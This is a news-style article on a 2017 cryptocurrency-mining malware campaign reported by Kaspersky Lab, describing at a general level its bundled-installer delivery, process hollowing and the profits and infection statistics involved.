Thousands of computers have been secretly hijacked for cybercriminal activities. Cryptocurrency mining malware applies sophisticated methods that have been used before. Those who are behind the operations are making millions of dollars thanks to it.
Hidden methods inside the PC is what makes mining malware so successful. Users don´t get aware of what is going on despite the increase of cooling fan activity. They hardly consider that as a real problem. It allows cyber crooks to collect huge amounts of money.
One operation was recently discovered. They are considered a “sophisticated” band of threat actors behind scenes who didn´t have a name. It was found as to be the most moneymaking cryptocurrency mining activity until now. The security company Kaspersky Lab suggested it might have allowed cybercriminals to make millions during the first semester of 2017.
Perhaps the main reason that makes the cryptocurrency mining operation so profitable is the method. The malware is installed with advanced techniques which are also backed by state-backed specialists and hackers.
The way to access the PC is by using a process-hollowing. At this point, the malware deactivates the right code of process and substitute it with a malign code.
At first, targeted users are attracted to download legitimate software. While following the instructions, the miner is also installed inside. It is what makes it undetectable for anti-virus programs.
A remote server completes the installation by running a Windows installer ´msiexec´, right after the dropper software is installed. It downloads and implements additional modules that execute the process-hollowing. At this point, hackers change the code including specific instructions for mining cryptocurrency.
Hackers take measures to assure the full installation of the cryptocurrency mining malware. To do so, the Windows system is programmed to reboot in case the user tries to stop the process. It makes it almost impossible for anti-virus to detect and eliminate it.
Only six months were necessary to allow attackers to make millions of dollars. They targeted a network of PC´s which has been used for a bunch of actors that were able to access them.
The huge return achieved through cryptocurrency mining resembles the most profitable ransomware frauds of 2017.
In general, high ranked and most profitable ransomware campaigns have decreased. At the same time, cryptocurrency mining malware has increased. This data shows how hackers swift from one method to another to obtain illicit money sources. However, some high-profile schemes remain the same.
Evolution of ransomware
Methods and schemes to spread mining software get more sophisticated every day. Cybercriminals are constantly changing them as ransomware attackers did it in the past. These are well-known tricks that were used in similar instances, as Anton Ivanov from Kaspersky Lab points out.
Kaspersky Lab statistics from 2017 show that 2.7 million users were affected. comparing it to the previous year, it represents an increase of 59 percent.